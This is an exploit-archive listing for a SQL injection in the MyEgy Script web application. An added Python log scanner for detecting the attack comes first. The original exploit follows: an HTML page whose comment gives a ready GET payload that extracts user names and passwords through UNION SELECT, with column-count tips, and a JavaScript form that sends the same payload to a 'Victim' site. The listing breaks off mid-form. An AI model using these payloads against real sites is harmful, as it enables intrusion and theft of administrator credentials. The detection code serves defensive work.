MyEgy Script suffers from a remote SQL injection vulnerability.
344a20a85a52a308d091f3c0bf9281361d30a96cb16daed4ba3ee34709bde521
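A defensive example added here, not part of the original listing: the header comment below traces the flaw to `$cat = $_REQUEST['c'];`, so requests can be screened by checking `c` against what a category id should look like. It assumes `c` is normally a short decimal integer and that the web server writes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate category id is a short decimal integer.
VALID_C = re.compile(r"\d{1,10}")
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
REQUEST = re.compile(r'(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def classify_c(value):
    """Classify one decoded value of the `c` parameter (GET or POST)."""
    if VALID_C.fullmatch(value):
        return "ok"
    # The POST form separates keywords with /**/ instead of spaces,
    # so inline comments are collapsed before matching.
    flat = re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value))
    if UNION_SELECT.search(flat):
        return "sqli-union"
    return "invalid"

def scan_access_log(lines):
    """Return (client, verdict, raw_c) for requests whose `c` is not an integer."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        # parse_qs percent-decodes the value and turns '+' into a space.
        query = parse_qs(urlsplit(m.group(2)).query, keep_blank_values=True)
        for raw in query.get("c", []):
            verdict = classify_c(raw)
            if verdict != "ok":
                hits.append((m.group(1), verdict, raw))
    return hits

# Constructed sample lines (documentation address ranges), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /myegy/?c=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Oct/2024:13:56:01 +0000] "GET /myegy/?c=-1+union+select+'
    '1,2,3,4,concat(name,0x3a,password),6,7,8+from+users-- HTTP/1.1" 200 4891',
    '198.51.100.9 - - [10/Oct/2024:13:56:09 +0000] "GET /myegy/?c=news HTTP/1.1" 200 300',
    '203.0.113.7 - - [10/Oct/2024:13:57:12 +0000] "GET /myegy/?do=login HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, verdict, raw in scan_access_log(SAMPLE_LOG):
        print(client, verdict, raw)
```

Access logs only show the GET variant; for the POST form, `classify_c` has to be called on the body value wherever the application or a proxy can see it.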
<html>
<!--
Script Name :MyEgy Script
Author : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email : K4rar@yahoo.com , ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of MyEgy script has a different number of columns, so try changing the (Columns number) field
to 6 or 7 or 9 if the exploit fails with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
.style1 {
text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
for(var n =1;n<co;n++){
if(tmp){
var tmp = tmp+n+",";
}else{
var tmp = n+",";
}
}
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="